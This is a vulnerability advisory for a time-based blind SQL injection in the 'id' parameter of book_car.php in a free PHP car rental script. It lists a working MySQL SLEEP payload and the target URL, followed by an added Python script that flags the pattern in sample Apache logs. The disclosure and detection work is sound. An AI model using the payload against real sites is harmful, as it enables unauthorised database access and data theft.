Car Rental Script from projectworlds.in suffers from a remote SQL injection vulnerability. Versions are not provided with this software currently.
====================================================================
Car Rental Script - Time-based blind SQL injection
====================================================================
####################################################################
.:. Author : Yussef Dajdaj
.:. Contact :
.:. Vendor : https://projectworlds.in/
.:. Script : https://projectworlds.in/free-projects/php-projects/car-rental-project-in-php-and-mysql/
.:. Date : 8/8/2020
.:. Tested on : Windows 10 64-bit environment || XAMPP
####################################################################
===[ Exploit ]===
[*] SQL injection
=================================
https://localhost/testing/book_car.php?id='[payload]
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=' AND (SELECT 4182 FROM (SELECT(SLEEP(5)))dQXQ) AND 'CYlu'='CYlu
the back-end DBMS is MySQL, web application technology: PHP 7.2.32, PHP, Apache 2.4.43
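
A log check for the request pattern in this advisory, added here as an example; it is not part of the original advisory or the vendor's code. It assumes Apache combined-format lines with `%D` (microseconds) appended, that a legitimate `id` is a plain integer, and a 4-second slow-request threshold; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (not real traffic): combined format + %D in microseconds.
SAMPLE_LOG = """\
192.0.2.10 - - [08/Aug/2020:10:00:01 +0000] "GET /testing/book_car.php?id=7 HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 41250
192.0.2.66 - - [08/Aug/2020:10:00:09 +0000] "GET /testing/book_car.php?id=%27%20AND%20%28SELECT%204182%20FROM%20%28SELECT%28SLEEP%285%29%29%29dQXQ%29%20AND%20%27CYlu%27%3D%27CYlu HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 5043817
192.0.2.66 - - [08/Aug/2020:10:00:15 +0000] "GET /testing/book_car.php?id=7%27 HTTP/1.1" 500 310 "-" "Mozilla/5.0" 38900
192.0.2.10 - - [08/Aug/2020:10:00:20 +0000] "GET /testing/index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0" 30100
"""

LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ '
    r'"[^"]*" "[^"]*" (\d+)$')
# MySQL functions commonly used to introduce a delay in time-based blind tests.
TIME_FUNCS = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)
PLAIN_ID = re.compile(r"[0-9]{1,10}")  # assumed legitimate shape of id


def analyse(log_text, slow_us=4_000_000):
    """Return one finding per book_car.php request whose id is not an integer."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        client, _method, target, status, duration = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/book_car.php"):
            continue
        # parse_qs URL-decodes, so %27 is compared as a literal quote.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if PLAIN_ID.fullmatch(value):
                continue
            reasons = ["non-numeric id"]
            if TIME_FUNCS.search(value):
                reasons.append("time-delay function")
            if int(duration) >= slow_us:
                reasons.append("slow response")
            findings.append({"client": client, "status": int(status),
                             "id": value, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f["client"], f["status"], ", ".join(f["reasons"]), "|", f["id"])
```

A request that carries all three reasons matches the time-based pattern in the advisory; a non-numeric `id` on its own is still worth reviewing because the parameter should never contain quotes.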